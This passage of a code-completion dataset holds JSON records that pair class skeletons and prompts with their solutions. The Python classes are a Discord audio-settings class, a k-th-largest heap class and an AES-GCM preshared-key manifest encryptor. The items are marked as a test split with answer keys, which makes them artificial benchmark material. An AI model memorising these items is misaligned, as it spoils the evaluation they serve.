...:\n frame_length = self.frame_length\n else:\n frame_length = validate_frame_length(frame_length)\n if sampling_rate is ...:\n sampling_rate = self.sampling_rate\n else:\n sampling_rate = validate_sampling_rate(sampling_rate)\n sample_size = 2 * channels\n samples_per_frame = int(sampling_rate / 1000 * frame_length)\n frame_size = samples_per_frame * sample_size\n buffer_type = CCharType * frame_size\n new = object.__new__(type(self))\n new.buffer_type = buffer_type\n new.channels = channels\n new.frame_length = frame_length\n new.frame_size = frame_size\n new.samples_per_frame = samples_per_frame\n new.sampling_rate = sampling_rate\n new.sample_size = sample_size\n return new\n<|end_body_4|>\n", "revision_id": "53f24fdb38459dc5a4fd04f11bdbfee8295b76a4", "skeleton": "<|skeleton|>\nclass AudioSettings:\n \"\"\"Attributes ---------- 
buffer_type : `type` C char array type for creating buffer. channels : `int` The number of channels. (1 if mono, 2 if stereo.) frame_length : `int` The length of a frame in milliseconds. frame_size : `int` The size of a frame in bytes. sampling_rate : `int` The number of samples per second that are taken of a waveform to create a digital signal. The higher the sample rate, the more snapshots are captured in the audio signal. sample_size : `int` The number of bits used to describe each sample. A sample is a value represented in `i16`. Each channel has their own samples. samples_per_frame : `int` The amount of samples that are in each frame.\"\"\"\n\n def __new__(cls, *, channels=..., frame_length=..., sampling_rate=...):\n \"\"\"Creates a new audio setting. Parameters ---------- channels : `int`, Optional (Keyword only) The number of channels. frame_length : `int`, Optional (Keyword only) The length of a frame in milliseconds. sampling_rate : `int`, Optional (Keyword only) The number of samples per second that are taken of a waveform to create a digital signal. Raises ------ TypeError - If a parameter's type is incorrect. ValueError - If a parameter's value is incorrect.\"\"\"\n <|body_0|>\n\n def __eq__(self, other):\n \"\"\"Returns whether the two audio settings are equal.\"\"\"\n <|body_1|>\n\n def __repr__(self):\n \"\"\"Returns the audio settings representation.\"\"\"\n <|body_2|>\n\n def copy(self):\n \"\"\"Copies the audio settings. Returns ------- new : `instance>`\"\"\"\n <|body_3|>\n\n def copy_with(self, *, channels=..., frame_length=..., sampling_rate=...):\n \"\"\"Copies the audio settings with the given fields. Parameters ---------- channels : `int`, Optional (Keyword only) The number of channels. frame_length : `int`, Optional (Keyword only) The length of a frame in milliseconds. sampling_rate : `int`, Optional (Keyword only) The number of samples per second that are taken of a waveform to create a digital signal. Returns ------- new : `instance>` Raises ------ TypeError - If a parameter's type is incorrect. ValueError - If a parameter's value is incorrect.\"\"\"\n <|body_4|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class AudioSettings:\n \"\"\"Attributes ---------- buffer_type : `type` C char array type for creating buffer. channels : `int` The number of channels. (1 if mono, 2 if stereo.) frame_length : `int` The length of a frame in milliseconds. frame_size : `int` The size of a frame in bytes. sampling_rate : `int` The number of samples per second that are taken of a waveform to create a digital signal. The higher the sample rate, the more snapshots are captured in the audio signal. sample_size : `int` The number of bits used to describe each sample. A sample is a value represented in `i16`. Each channel has their own samples. samples_per_frame : `int` The amount of samples that are in each frame.\"\"\"\n\n def __new__(cls, *, channels=..., frame_length=..., sampling_rate=...):\n \"\"\"Creates a new audio setting. Parameters ---------- channels : `int`, Optional (Keyword only) The number of channels. frame_length : `int`, Optional (Keyword only) The length of a frame in milliseconds. sampling_rate : `int`, Optional (Keyword only) The number of samples per second that are taken of a waveform to create a digital signal. Raises ------ TypeError - If a parameter's type is incorrect. 
ValueError - If a parameter's value is incorrect.\"\"\"\n if channels is ...:\n channels = CHANNELS_DEFAULT\n else:\n channels = validate_channels(channels)\n if frame_length is ...:\n frame_length = FRAME_LENGTH_DEFAULT\n else:\n frame_length = validate_frame_length(frame_length)\n if sampling_rate is ...:\n sampling_rate = SAMPLING_RATE_DEFAULT\n else:\n sampling_rate = validate_sampling_rate(sampling_rate)\n sample_size = 2 * channels\n samples_per_frame = int(sampling_rate / 1000 * frame_length)\n frame_size = samples_per_frame * sample_size\n buffer_type = CCharType * frame_size\n self = object.__new__(cls)\n self.buffer_type = buffer_type\n self.channels = channels\n self.frame_length = frame_length\n self.frame_size = frame_size\n self.samples_per_frame = samples_per_frame\n self.sampling_rate = sampling_rate\n self.sample_size = sample_size\n return self\n\n def __eq__(self, other):\n \"\"\"Returns whether the two audio settings are equal.\"\"\"\n if type(self) is not type(other):\n return NotImplemented\n if self.channels != other.channels:\n return False\n if self.frame_length != other.frame_length:\n return False\n if self.sampling_rate != other.sampling_rate:\n return False\n return True\n\n def __repr__(self):\n \"\"\"Returns the audio settings representation.\"\"\"\n repr_parts = ['<', self.__class__.__name__]\n repr_parts.append(' channels = ')\n repr_parts.append(repr(self.channels))\n repr_parts.append(', frame_length = ')\n repr_parts.append(repr(self.frame_length))\n repr_parts.append(', sampling_rate = ')\n repr_parts.append(repr(self.sampling_rate))\n repr_parts.append('>')\n return ''.join(repr_parts)\n\n def copy(self):\n \"\"\"Copies the audio settings. Returns ------- new : `instance>`\"\"\"\n new = object.__new__(type(self))\n new.buffer_type = self.buffer_type\n new.channels = self.channels\n new.frame_length = self.frame_length\n new.frame_size = self.frame_size\n new.samples_per_frame = self.samples_per_frame\n new.sampling_rate = self.sampling_rate\n new.sample_size = self.sample_size\n return new\n\n def copy_with(self, *, channels=..., frame_length=..., sampling_rate=...):\n \"\"\"Copies the audio settings with the given fields. Parameters ---------- channels : `int`, Optional (Keyword only) The number of channels. frame_length : `int`, Optional (Keyword only) The length of a frame in milliseconds. sampling_rate : `int`, Optional (Keyword only) The number of samples per second that are taken of a waveform to create a digital signal. Returns ------- new : `instance>` Raises ------ TypeError - If a parameter's type is incorrect. 
ValueError - If a parameter's value is incorrect.\"\"\"\n if channels is ...:\n channels = self.channels\n else:\n channels = validate_channels(channels)\n if frame_length is ...:\n frame_length = self.frame_length\n else:\n frame_length = validate_frame_length(frame_length)\n if sampling_rate is ...:\n sampling_rate = self.sampling_rate\n else:\n sampling_rate = validate_sampling_rate(sampling_rate)\n sample_size = 2 * channels\n samples_per_frame = int(sampling_rate / 1000 * frame_length)\n frame_size = samples_per_frame * sample_size\n buffer_type = CCharType * frame_size\n new = object.__new__(type(self))\n new.buffer_type = buffer_type\n new.channels = channels\n new.frame_length = frame_length\n new.frame_size = frame_size\n new.samples_per_frame = samples_per_frame\n new.sampling_rate = sampling_rate\n new.sample_size = sample_size\n return new\n", "source": "the_stack_v2_python_sparse", "source_path": "hata/discord/voice/audio_settings/audio_settings.py", "source_repo": "HuyaneMatsu/hata", "split": "test", "star_events_count": 3} {"blob_id": "0c70a6ae6b72489e68ca3b12f63c1510a603e752", "bodies": ["self.k = k\nself.nums = nums\nheapq.heapify(self.nums)", "heapq.heappush(self.nums, val)\nwhile len(self.nums) > self.k:\n heapq.heappop(self.nums)\nreturn self.nums[0]"], "bodies_text": "<|body_start_0|>\n self.k = k\n self.nums = nums\n heapq.heapify(self.nums)\n<|end_body_0|>\n\n<|body_start_1|>\n heapq.heappush(self.nums, val)\n while len(self.nums) > self.k:\n heapq.heappop(self.nums)\n return self.nums[0]\n<|end_body_1|>\n", "class_docstring": "", "class_name": "KthLargest", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass KthLargest:\n\n def __init__(self, k, nums):\n \"\"\":type k: int :type nums: List[int]\"\"\"\n <|body_0|>\n\n def add(self, val):\n \"\"\":type val: int :rtype: int\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.k = k\n self.nums = nums\n heapq.heapify(self.nums)\n<|end_body_0|>\n\n<|body_start_1|>\n heapq.heappush(self.nums, val)\n while len(self.nums) > self.k:\n heapq.heappop(self.nums)\n return self.nums[0]\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000022", "length_bytes": 1050, "license_type": "no_license", "methods": [{"docstring": ":type k: int :type nums: List[int]", "name": "__init__", "signature": "def __init__(self, k, nums)"}, {"docstring": ":type val: int :rtype: int", "name": "add", "signature": "def add(self, val)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_005531", "prompt": "Implement the Python class `KthLargest` described below.\n\nClass description:\nImplement the KthLargest class.\n\nMethod signatures and docstrings:\n- def __init__(self, k, nums): :type k: int :type nums: List[int]\n- def add(self, val): :type val: int :rtype: int", "prompted_full_text": "Implement the Python class `KthLargest` described below.\n\nClass description:\nImplement the KthLargest class.\n\nMethod signatures and docstrings:\n- def __init__(self, k, nums): :type k: int :type nums: List[int]\n- def add(self, val): :type val: int :rtype: int\n\n<|skeleton|>\nclass KthLargest:\n\n def __init__(self, k, nums):\n \"\"\":type k: int :type nums: List[int]\"\"\"\n <|body_0|>\n\n def add(self, val):\n \"\"\":type val: int :rtype: int\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.k = k\n self.nums = nums\n heapq.heapify(self.nums)\n<|end_body_0|>\n\n<|body_start_1|>\n heapq.heappush(self.nums, val)\n while len(self.nums) > 
self.k:\n heapq.heappop(self.nums)\n return self.nums[0]\n<|end_body_1|>\n", "revision_id": "139a2808c551bcf77c8ebba8d387f6ea13c1507c", "skeleton": "<|skeleton|>\nclass KthLargest:\n\n def __init__(self, k, nums):\n \"\"\":type k: int :type nums: List[int]\"\"\"\n <|body_0|>\n\n def add(self, val):\n \"\"\":type val: int :rtype: int\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class KthLargest:\n def __init__(self, k, nums):\n \"\"\":type k: int :type nums: List[int]\"\"\"\n self.k = k\n self.nums = nums\n heapq.heapify(self.nums)\n\n def add(self, val):\n \"\"\":type val: int :rtype: int\"\"\"\n heapq.heappush(self.nums, val)\n while len(self.nums) > self.k:\n heapq.heappop(self.nums)\n return self.nums[0]\n", "source": "the_stack_v2_python_sparse", "source_path": "Kth Largest Element in a Stream.py", "source_repo": "arekatlabhanuja/Leetcode-Problems", "split": "test", "star_events_count": 0} {"blob_id": "f1903ce22940930c3bb3a416f3ca6bfdb9c767e6", "bodies": ["if not isinstance(key, ccnpy.crypto.AesGcmKey):\n raise TypeError('key must be ccnpy.crypto.AesGcmKey')\nself._key = key\nself._key_number = key_number", "if not isinstance(node, ccnpy.flic.Node):\n raise TypeError('node must be ccnpy.flic.Node')\nplaintext = node.serialized_value()\niv = self._key.nonce()\nsecurity_ctx = None\nif len(self._key) == 128:\n security_ctx = PresharedKeyCtx.create_aes_gcm_128(key_number=self._key_number, iv=iv)\nelif len(self._key) == 256:\n security_ctx = PresharedKeyCtx.create_aes_gcm_256(key_number=self._key_number, iv=iv)\nelse:\n raise ValueError('Unsupported key length %r' % len(self._key))\nciphertext, a = self._key.encrypt(nonce=iv, plaintext=plaintext, associated_data=security_ctx.serialize())\nencrypted_node = ccnpy.flic.EncryptedNode(ciphertext)\nauth_tag = ccnpy.flic.AuthTag(a)\nreturn (security_ctx, encrypted_node, auth_tag)", "security_ctx, encrypted_node, auth_tag = self.encrypt(node)\nmanifest = ccnpy.flic.Manifest(security_ctx=security_ctx, node=encrypted_node, auth_tag=auth_tag)\nreturn manifest", "if not isinstance(encrypted_node, ccnpy.flic.EncryptedNode):\n raise TypeError('encrypted_node must be ccnpy.flic.EncryptedNode')\nif security_ctx is None:\n raise ValueError('security context must not be None')\nif not isinstance(security_ctx, ccnpy.flic.presharedkey.PresharedKeyCtx):\n raise TypeError('security_ctx must be a ccnpy.flic.PresharedKeyCtx')\nif auth_tag is None:\n raise ValueError('auth_tag must not be None')\nif not isinstance(auth_tag, ccnpy.flic.AuthTag):\n raise TypeError('auth_tag must be ccnpy.flic.AuthTag')\nif security_ctx.key_number() != self._key_number:\n raise ValueError('security_ctx.key_number %r != our key_number %r' % (security_ctx.key_number(), self._key_number))\nplaintext = self._key.decrypt(nonce=security_ctx.iv(), ciphertext=encrypted_node.value(), associated_data=security_ctx.serialize(), auth_tag=auth_tag.value())\nnode_tlv = ccnpy.Tlv(ccnpy.flic.Node.class_type(), plaintext)\nnode = ccnpy.flic.Node.parse(node_tlv)\nreturn node", "if not isinstance(encrypted_manifest, ccnpy.flic.Manifest):\n raise TypeError('encrypted_manifest must be ccnpy.flic.Manifest')\nsecurity_ctx = encrypted_manifest.security_ctx()\nencrypted_node = encrypted_manifest.node()\nauth_tag = encrypted_manifest.auth_tag()\nif not isinstance(encrypted_node, ccnpy.flic.EncryptedNode):\n raise TypeError('manifest did not contain an encrypted node')\nif security_ctx is None:\n 
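# --- Editor's trace of the KthLargest record above (k = 3). ---
# Self-contained restatement (the record's class relies on a module-level
# `import heapq` that is outside the skeleton) plus a usage trace: the class
# keeps a min-heap of the k largest values seen so far, so the heap root is
# always the k-th largest element of the stream.
import heapq

class KthLargestDemo:
    def __init__(self, k, nums):
        self.k, self.nums = k, nums
        heapq.heapify(self.nums)

    def add(self, val):
        heapq.heappush(self.nums, val)
        while len(self.nums) > self.k:     # shed everything below the top k
            heapq.heappop(self.nums)
        return self.nums[0]                # root = k-th largest

kth = KthLargestDemo(3, [4, 5, 8, 2])
assert [kth.add(v) for v in (3, 5, 10, 9, 4)] == [4, 5, 5, 8, 8]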
raise ValueError('security context must not be None')\nif not isinstance(security_ctx, PresharedKeyCtx):\n raise TypeError('security_ctx must be a ccnpy.flic.PresharedKeyCtx')\nif auth_tag is None:\n raise ValueError('auth_tag must not be None')\nnode = self.decrypt_node(security_ctx=security_ctx, encrypted_node=encrypted_node, auth_tag=auth_tag)\nmanifest = ccnpy.flic.Manifest(node=node)\nreturn manifest"], "bodies_text": "<|body_start_0|>\n if not isinstance(key, ccnpy.crypto.AesGcmKey):\n raise TypeError('key must be ccnpy.crypto.AesGcmKey')\n self._key = key\n self._key_number = key_number\n<|end_body_0|>\n\n<|body_start_1|>\n if not isinstance(node, ccnpy.flic.Node):\n raise TypeError('node must be ccnpy.flic.Node')\n plaintext = node.serialized_value()\n iv = self._key.nonce()\n security_ctx = None\n if len(self._key) == 128:\n security_ctx = PresharedKeyCtx.create_aes_gcm_128(key_number=self._key_number, iv=iv)\n elif len(self._key) == 256:\n security_ctx = PresharedKeyCtx.create_aes_gcm_256(key_number=self._key_number, iv=iv)\n else:\n raise ValueError('Unsupported key length %r' % len(self._key))\n ciphertext, a = self._key.encrypt(nonce=iv, plaintext=plaintext, associated_data=security_ctx.serialize())\n encrypted_node = ccnpy.flic.EncryptedNode(ciphertext)\n auth_tag = ccnpy.flic.AuthTag(a)\n return (security_ctx, encrypted_node, auth_tag)\n<|end_body_1|>\n\n<|body_start_2|>\n security_ctx, encrypted_node, auth_tag = self.encrypt(node)\n manifest = ccnpy.flic.Manifest(security_ctx=security_ctx, node=encrypted_node, auth_tag=auth_tag)\n return manifest\n<|end_body_2|>\n\n<|body_start_3|>\n if not isinstance(encrypted_node, ccnpy.flic.EncryptedNode):\n raise TypeError('encrypted_node must be ccnpy.flic.EncryptedNode')\n if security_ctx is None:\n raise ValueError('security context must not be None')\n if not isinstance(security_ctx, ccnpy.flic.presharedkey.PresharedKeyCtx):\n raise TypeError('security_ctx must be a ccnpy.flic.PresharedKeyCtx')\n if auth_tag is None:\n raise ValueError('auth_tag must not be None')\n if not isinstance(auth_tag, ccnpy.flic.AuthTag):\n raise TypeError('auth_tag must be ccnpy.flic.AuthTag')\n if security_ctx.key_number() != self._key_number:\n raise ValueError('security_ctx.key_number %r != our key_number %r' % (security_ctx.key_number(), self._key_number))\n plaintext = self._key.decrypt(nonce=security_ctx.iv(), ciphertext=encrypted_node.value(), associated_data=security_ctx.serialize(), auth_tag=auth_tag.value())\n node_tlv = ccnpy.Tlv(ccnpy.flic.Node.class_type(), plaintext)\n node = ccnpy.flic.Node.parse(node_tlv)\n return node\n<|end_body_3|>\n\n<|body_start_4|>\n if not isinstance(encrypted_manifest, ccnpy.flic.Manifest):\n raise TypeError('encrypted_manifest must be ccnpy.flic.Manifest')\n security_ctx = encrypted_manifest.security_ctx()\n encrypted_node = encrypted_manifest.node()\n auth_tag = encrypted_manifest.auth_tag()\n if not isinstance(encrypted_node, ccnpy.flic.EncryptedNode):\n raise TypeError('manifest did not contain an encrypted node')\n if security_ctx is None:\n raise ValueError('security context must not be None')\n if not isinstance(security_ctx, PresharedKeyCtx):\n raise TypeError('security_ctx must be a ccnpy.flic.PresharedKeyCtx')\n if auth_tag is None:\n raise ValueError('auth_tag must not be None')\n node = self.decrypt_node(security_ctx=security_ctx, encrypted_node=encrypted_node, auth_tag=auth_tag)\n manifest = ccnpy.flic.Manifest(node=node)\n return manifest\n<|end_body_4|>\n", "class_docstring": "The PresharedKey 
algorithm. Typically, you will use `PresharedKey.create_manifest(...)` to create a Manifest TLV out of a ccnpy.flic.Node.", "class_name": "PresharedKey", "detected_licenses": ["Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass PresharedKey:\n \"\"\"The PresharedKey algorithm. Typically, you will use `PresharedKey.create_manifest(...)` to create a Manifest TLV out of a ccnpy.flic.Node.\"\"\"\n\n def __init__(self, key, key_number):\n \"\"\":param key: A ccnpy.crypto.AesGcmKey :param key_number: An integer used to reference the key\"\"\"\n <|body_0|>\n\n def encrypt(self, node):\n \"\"\":param node: A ccnpy.flic.Node :return: (security_ctx, encrypted_node, auth_tag)\"\"\"\n <|body_1|>\n\n def create_encrypted_manifest(self, node):\n \"\"\":param node: A ccnpy.flic.Node to encrypt and wrap in a Manifest :return: A ccnpy.flic.Manifest\"\"\"\n <|body_2|>\n\n def decrypt_node(self, security_ctx, encrypted_node, auth_tag):\n \"\"\"Example: manifest = ccnpy.flic.Manifest.deserialize(payload.value()) if isinstance(manifest.security_ctx(), ccnpy.flic.PresharedKeyCtx): # keystore is not necessarily provided key = keystore.get(manifest.security_ctx().key_number()) psk = ccnpy.flic.PresharedKey(key) node = psk.decrypt_node(manifest.security_ctx(), manifest.node(), manifest.auth_tag()) :param security_ctx: A ccnpy.flic.PresharedKeyCtx :param encrypted_node: A ccnpy.flic.EncryptedNode :param auth_tag: A ccnpy.flic.AuthTag :return: a ccnpy.flic.Node\"\"\"\n <|body_3|>\n\n def decrypt_manifest(self, encrypted_manifest):\n \"\"\"Example: manifest = ccnpy.flic.Manifest.deserialize(payload.value()) if isinstance(manifest.security_ctx(), ccnpy.flic.PresharedKeyCtx): # keystore is not necessarily provided key = keystore.get(manifest.security_ctx().key_number()) psk = ccnpy.flic.PresharedKey(key) manifest = psk.decrypt_to_manifest(manifest) :param encrypted_manifest: :return: A decrypted manifest\"\"\"\n <|body_4|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if not isinstance(key, ccnpy.crypto.AesGcmKey):\n raise TypeError('key must be ccnpy.crypto.AesGcmKey')\n self._key = key\n self._key_number = key_number\n<|end_body_0|>\n\n<|body_start_1|>\n if not isinstance(node, ccnpy.flic.Node):\n raise TypeError('node must be ccnpy.flic.Node')\n plaintext = node.serialized_value()\n iv = self._key.nonce()\n security_ctx = None\n if len(self._key) == 128:\n security_ctx = PresharedKeyCtx.create_aes_gcm_128(key_number=self._key_number, iv=iv)\n elif len(self._key) == 256:\n security_ctx = PresharedKeyCtx.create_aes_gcm_256(key_number=self._key_number, iv=iv)\n else:\n raise ValueError('Unsupported key length %r' % len(self._key))\n ciphertext, a = self._key.encrypt(nonce=iv, plaintext=plaintext, associated_data=security_ctx.serialize())\n encrypted_node = ccnpy.flic.EncryptedNode(ciphertext)\n auth_tag = ccnpy.flic.AuthTag(a)\n return (security_ctx, encrypted_node, auth_tag)\n<|end_body_1|>\n\n<|body_start_2|>\n security_ctx, encrypted_node, auth_tag = self.encrypt(node)\n manifest = ccnpy.flic.Manifest(security_ctx=security_ctx, node=encrypted_node, auth_tag=auth_tag)\n return manifest\n<|end_body_2|>\n\n<|body_start_3|>\n if not isinstance(encrypted_node, ccnpy.flic.EncryptedNode):\n raise TypeError('encrypted_node must be ccnpy.flic.EncryptedNode')\n if security_ctx is None:\n raise ValueError('security context must not be None')\n if not isinstance(security_ctx, ccnpy.flic.presharedkey.PresharedKeyCtx):\n raise TypeError('security_ctx must be a 
ccnpy.flic.PresharedKeyCtx')\n if auth_tag is None:\n raise ValueError('auth_tag must not be None')\n if not isinstance(auth_tag, ccnpy.flic.AuthTag):\n raise TypeError('auth_tag must be ccnpy.flic.AuthTag')\n if security_ctx.key_number() != self._key_number:\n raise ValueError('security_ctx.key_number %r != our key_number %r' % (security_ctx.key_number(), self._key_number))\n plaintext = self._key.decrypt(nonce=security_ctx.iv(), ciphertext=encrypted_node.value(), associated_data=security_ctx.serialize(), auth_tag=auth_tag.value())\n node_tlv = ccnpy.Tlv(ccnpy.flic.Node.class_type(), plaintext)\n node = ccnpy.flic.Node.parse(node_tlv)\n return node\n<|end_body_3|>\n\n<|body_start_4|>\n if not isinstance(encrypted_manifest, ccnpy.flic.Manifest):\n raise TypeError('encrypted_manifest must be ccnpy.flic.Manifest')\n security_ctx = encrypted_manifest.security_ctx()\n encrypted_node = encrypted_manifest.node()\n auth_tag = encrypted_manifest.auth_tag()\n if not isinstance(encrypted_node, ccnpy.flic.EncryptedNode):\n raise TypeError('manifest did not contain an encrypted node')\n if security_ctx is None:\n raise ValueError('security context must not be None')\n if not isinstance(security_ctx, PresharedKeyCtx):\n raise TypeError('security_ctx must be a ccnpy.flic.PresharedKeyCtx')\n if auth_tag is None:\n raise ValueError('auth_tag must not be None')\n node = self.decrypt_node(security_ctx=security_ctx, encrypted_node=encrypted_node, auth_tag=auth_tag)\n manifest = ccnpy.flic.Manifest(node=node)\n return manifest\n<|end_body_4|>\n", "id": "stack_v2_sparse_classes_10k_test_000023", "length_bytes": 6382, "license_type": "permissive", "methods": [{"docstring": ":param key: A ccnpy.crypto.AesGcmKey :param key_number: An integer used to reference the key", "name": "__init__", "signature": "def __init__(self, key, key_number)"}, {"docstring": ":param node: A ccnpy.flic.Node :return: (security_ctx, encrypted_node, auth_tag)", "name": "encrypt", "signature": "def encrypt(self, node)"}, {"docstring": ":param node: A ccnpy.flic.Node to encrypt and wrap in a Manifest :return: A ccnpy.flic.Manifest", "name": "create_encrypted_manifest", "signature": "def create_encrypted_manifest(self, node)"}, {"docstring": "Example: manifest = ccnpy.flic.Manifest.deserialize(payload.value()) if isinstance(manifest.security_ctx(), ccnpy.flic.PresharedKeyCtx): # keystore is not necessarily provided key = keystore.get(manifest.security_ctx().key_number()) psk = ccnpy.flic.PresharedKey(key) node = psk.decrypt_node(manifest.security_ctx(), manifest.node(), manifest.auth_tag()) :param security_ctx: A ccnpy.flic.PresharedKeyCtx :param encrypted_node: A ccnpy.flic.EncryptedNode :param auth_tag: A ccnpy.flic.AuthTag :return: a ccnpy.flic.Node", "name": "decrypt_node", "signature": "def decrypt_node(self, security_ctx, encrypted_node, auth_tag)"}, {"docstring": "Example: manifest = ccnpy.flic.Manifest.deserialize(payload.value()) if isinstance(manifest.security_ctx(), ccnpy.flic.PresharedKeyCtx): # keystore is not necessarily provided key = keystore.get(manifest.security_ctx().key_number()) psk = ccnpy.flic.PresharedKey(key) manifest = psk.decrypt_to_manifest(manifest) :param encrypted_manifest: :return: A decrypted manifest", "name": "decrypt_manifest", "signature": "def decrypt_manifest(self, encrypted_manifest)"}], "n_methods": 5, "original_id": "stack_v2_sparse_classes_30k_train_002804", "prompt": "Implement the Python class `PresharedKey` described below.\n\nClass description:\nThe PresharedKey algorithm. 
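To make the flow concrete, a hedged round-trip sketch using only the calls this record documents; how the AesGcmKey and the plaintext Node are obtained is outside the record, so both are left to the caller rather than invented here.

def round_trip(key, node, key_number=7):
    """key: a ccnpy.crypto.AesGcmKey (128- or 256-bit); node: a ccnpy.flic.Node.
    The key_number default is illustrative only."""
    psk = PresharedKey(key, key_number)
    manifest = psk.create_encrypted_manifest(node)   # ctx + EncryptedNode + AuthTag
    return psk.decrypt_manifest(manifest)            # verifies the GCM auth tag too

Worth noting as a design choice visible in the bodies: decrypt_node passes the serialized security context back in as AES-GCM associated data, so tampering with the key number or IV in the context also fails authentication, not just tampering with the ciphertext.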
Typically, you will use `PresharedKey.create_manifest(...)` to create a Manifest TLV out of a ccnpy.flic.Node.\n\nMethod signatures and docstrings:\n- def __init__(self, key, key_number): :param key: A ccnpy.crypto.AesGcmKey :param key_number: An integer used to reference the key\n- def encrypt(self, node): :param node: A ccnpy.flic.Node :return: (security_ctx, encrypted_node, auth_tag)\n- def create_encrypted_manifest(self, node): :param node: A ccnpy.flic.Node to encrypt and wrap in a Manifest :return: A ccnpy.flic.Manifest\n- def decrypt_node(self, security_ctx, encrypted_node, auth_tag): Example: manifest = ccnpy.flic.Manifest.deserialize(payload.value()) if isinstance(manifest.security_ctx(), ccnpy.flic.PresharedKeyCtx): # keystore is not necessarily provided key = keystore.get(manifest.security_ctx().key_number()) psk = ccnpy.flic.PresharedKey(key) node = psk.decrypt_node(manifest.security_ctx(), manifest.node(), manifest.auth_tag()) :param security_ctx: A ccnpy.flic.PresharedKeyCtx :param encrypted_node: A ccnpy.flic.EncryptedNode :param auth_tag: A ccnpy.flic.AuthTag :return: a ccnpy.flic.Node\n- def decrypt_manifest(self, encrypted_manifest): Example: manifest = ccnpy.flic.Manifest.deserialize(payload.value()) if isinstance(manifest.security_ctx(), ccnpy.flic.PresharedKeyCtx): # keystore is not necessarily provided key = keystore.get(manifest.security_ctx().key_number()) psk = ccnpy.flic.PresharedKey(key) manifest = psk.decrypt_to_manifest(manifest) :param encrypted_manifest: :return: A decrypted manifest", "prompted_full_text": "Implement the Python class `PresharedKey` described below.\n\nClass description:\nThe PresharedKey algorithm. Typically, you will use `PresharedKey.create_manifest(...)` to create a Manifest TLV out of a ccnpy.flic.Node.\n\nMethod signatures and docstrings:\n- def __init__(self, key, key_number): :param key: A ccnpy.crypto.AesGcmKey :param key_number: An integer used to reference the key\n- def encrypt(self, node): :param node: A ccnpy.flic.Node :return: (security_ctx, encrypted_node, auth_tag)\n- def create_encrypted_manifest(self, node): :param node: A ccnpy.flic.Node to encrypt and wrap in a Manifest :return: A ccnpy.flic.Manifest\n- def decrypt_node(self, security_ctx, encrypted_node, auth_tag): Example: manifest = ccnpy.flic.Manifest.deserialize(payload.value()) if isinstance(manifest.security_ctx(), ccnpy.flic.PresharedKeyCtx): # keystore is not necessarily provided key = keystore.get(manifest.security_ctx().key_number()) psk = ccnpy.flic.PresharedKey(key) node = psk.decrypt_node(manifest.security_ctx(), manifest.node(), manifest.auth_tag()) :param security_ctx: A ccnpy.flic.PresharedKeyCtx :param encrypted_node: A ccnpy.flic.EncryptedNode :param auth_tag: A ccnpy.flic.AuthTag :return: a ccnpy.flic.Node\n- def decrypt_manifest(self, encrypted_manifest): Example: manifest = ccnpy.flic.Manifest.deserialize(payload.value()) if isinstance(manifest.security_ctx(), ccnpy.flic.PresharedKeyCtx): # keystore is not necessarily provided key = keystore.get(manifest.security_ctx().key_number()) psk = ccnpy.flic.PresharedKey(key) manifest = psk.decrypt_to_manifest(manifest) :param encrypted_manifest: :return: A decrypted manifest\n\n<|skeleton|>\nclass PresharedKey:\n \"\"\"The PresharedKey algorithm. 
Typically, you will use `PresharedKey.create_manifest(...)` to create a Manifest TLV out of a ccnpy.flic.Node.\"\"\"\n\n def __init__(self, key, key_number):\n \"\"\":param key: A ccnpy.crypto.AesGcmKey :param key_number: An integer used to reference the key\"\"\"\n <|body_0|>\n\n def encrypt(self, node):\n \"\"\":param node: A ccnpy.flic.Node :return: (security_ctx, encrypted_node, auth_tag)\"\"\"\n <|body_1|>\n\n def create_encrypted_manifest(self, node):\n \"\"\":param node: A ccnpy.flic.Node to encrypt and wrap in a Manifest :return: A ccnpy.flic.Manifest\"\"\"\n <|body_2|>\n\n def decrypt_node(self, security_ctx, encrypted_node, auth_tag):\n \"\"\"Example: manifest = ccnpy.flic.Manifest.deserialize(payload.value()) if isinstance(manifest.security_ctx(), ccnpy.flic.PresharedKeyCtx): # keystore is not necessarily provided key = keystore.get(manifest.security_ctx().key_number()) psk = ccnpy.flic.PresharedKey(key) node = psk.decrypt_node(manifest.security_ctx(), manifest.node(), manifest.auth_tag()) :param security_ctx: A ccnpy.flic.PresharedKeyCtx :param encrypted_node: A ccnpy.flic.EncryptedNode :param auth_tag: A ccnpy.flic.AuthTag :return: a ccnpy.flic.Node\"\"\"\n <|body_3|>\n\n def decrypt_manifest(self, encrypted_manifest):\n \"\"\"Example: manifest = ccnpy.flic.Manifest.deserialize(payload.value()) if isinstance(manifest.security_ctx(), ccnpy.flic.PresharedKeyCtx): # keystore is not necessarily provided key = keystore.get(manifest.security_ctx().key_number()) psk = ccnpy.flic.PresharedKey(key) manifest = psk.decrypt_to_manifest(manifest) :param encrypted_manifest: :return: A decrypted manifest\"\"\"\n <|body_4|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if not isinstance(key, ccnpy.crypto.AesGcmKey):\n raise TypeError('key must be ccnpy.crypto.AesGcmKey')\n self._key = key\n self._key_number = key_number\n<|end_body_0|>\n\n<|body_start_1|>\n if not isinstance(node, ccnpy.flic.Node):\n raise TypeError('node must be ccnpy.flic.Node')\n plaintext = node.serialized_value()\n iv = self._key.nonce()\n security_ctx = None\n if len(self._key) == 128:\n security_ctx = PresharedKeyCtx.create_aes_gcm_128(key_number=self._key_number, iv=iv)\n elif len(self._key) == 256:\n security_ctx = PresharedKeyCtx.create_aes_gcm_256(key_number=self._key_number, iv=iv)\n else:\n raise ValueError('Unsupported key length %r' % len(self._key))\n ciphertext, a = self._key.encrypt(nonce=iv, plaintext=plaintext, associated_data=security_ctx.serialize())\n encrypted_node = ccnpy.flic.EncryptedNode(ciphertext)\n auth_tag = ccnpy.flic.AuthTag(a)\n return (security_ctx, encrypted_node, 